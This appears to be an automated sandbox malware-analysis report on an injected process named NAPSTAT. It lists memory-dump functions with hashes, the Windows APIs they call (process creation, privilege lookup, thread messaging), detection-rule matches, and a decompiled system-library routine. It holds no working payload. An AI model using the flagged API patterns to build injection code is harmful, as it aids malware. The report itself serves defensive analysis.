Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FBC3

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FB73

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FB5B

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FAF3

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FADB

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FAC3

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FDCB

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FD9A

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FC6B

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FFBF

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 01F1FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01F1FEDB

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0009A063, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D
RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D

Strings

.z`, xrefs: 0009A08C, 0009A098

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: .z`
API String ID: 2488874121-1441809116
Opcode ID: 981331c3a34446a02d5e7f7168ea2a95cc07c4614ce61c341a24d0d0a3ea7b0e
Instruction ID: b8c84256dc10420e9330285417f6a1b921f00a9cbee3cb09efe5cb3eaa3de9fb
Opcode Fuzzy Hash: 981331c3a34446a02d5e7f7168ea2a95cc07c4614ce61c341a24d0d0a3ea7b0e
Instruction Fuzzy Hash: 27F049B1200208AFDB18DF58DC80DA773A9EF88320F118599FD49A7352C630ED148AF1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D

Strings

.z`, xrefs: 0009A08C, 0009A098

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: a7483037e4c1910e9d9a21d5e5a2e149c0cc1c863966a88349e8802865b111dc
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F5E04FB12002086BDB14DF59CC45EE777ACEF88750F018554FD0857242C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: b15f46ee9257f5a5c87ffb515308c002f2a10d2124ddc5db4670f24c2034491f
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 9C018F31A802287AFB20B6949C43FFE776CAB51F51F044119FB04BA1C2EAD46A0657E6

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0DD, Relevance: 1.5, APIs: 1, Instructions: 44
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: f993895597dd0918064c7f3c413cf66e7554eeda7544c3d697d74538bea70c45
Instruction ID: 8cc65e811fb47f8ee06211055fe3e3dbd2e1a05d9b691a325fc30f445e1186d4
Opcode Fuzzy Hash: f993895597dd0918064c7f3c413cf66e7554eeda7544c3d697d74538bea70c45
Instruction Fuzzy Hash: FB01ABB2210108ABCB58DF89DC81EEB77ADAF8C754F158258FA0DA7241D630E851CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A0E0, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 4a9b53bd2a9bc7990f2f7393a3eeed257928f61c893ff4aa5ad3e931d0c8cf1f
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 4D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0009A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00094506,?,00094C7F,00094C7F,?,00094506,?,?,?,?,?,00000000,00000000,?), ref: 0009A05D

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: ec980586e866633e4aeb80c8be97deace24af98f09b0c5f3d0675f8f0a4febe8
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 80E012B1200208ABDB14EF99CC81EA777ACEF88650F118558BA086B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1CC, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 98249d9af5736c104922a464f17679f73138a2f4e01fa9d4bad7ff5b1365b051
Instruction ID: 3f280d6e93efcf38aae49350715603c3f3e95fb7edf9e5cce56db4ce78df5186
Opcode Fuzzy Hash: 98249d9af5736c104922a464f17679f73138a2f4e01fa9d4bad7ff5b1365b051
Instruction Fuzzy Hash: B4E01AB16002086BDB20EF84CC85EE737A9EF89650F018564BE486B242D930E9118BF1

Uniqueness

Uniqueness Score: -1.00%

Function 0009A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 4ff4872ce74a436925e1108b6439f3c92e3127fea3b99fbfc9c4cc2734285a84
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 55E01AB12002086BDB10DF49CC85EE737ADEF89650F018154BA0867242C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008F69A, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 93225f503e1cae99107bc0036e00d4080fbdefc438daae27fd716bee03cedf4c
Instruction ID: 2461f253dac217917d81d726c2bb7e174a4fd4e77ebe1b7c91841007caf59aa6
Opcode Fuzzy Hash: 93225f503e1cae99107bc0036e00d4080fbdefc438daae27fd716bee03cedf4c
Instruction Fuzzy Hash: B3D05E667D43043EEB10FAB89C03FA633C96B6A714F490075FA9CD73C3E954D5028665

Uniqueness

Uniqueness Score: -1.00%

Function 0008F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB

Memory Dump Source

Source File: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_80000_NAPSTAT.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction ID: 6417aeeebd7252583303f3220bff117056388d79c37cbfd200bc3d3567543684
Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
Instruction Fuzzy Hash: 22D0A7717903043BEA10FAA49C03F6632CD6B44B04F490074FA88D73C3E950E4014165

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01F48788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01F48788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01F48460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01F2E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01F4718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
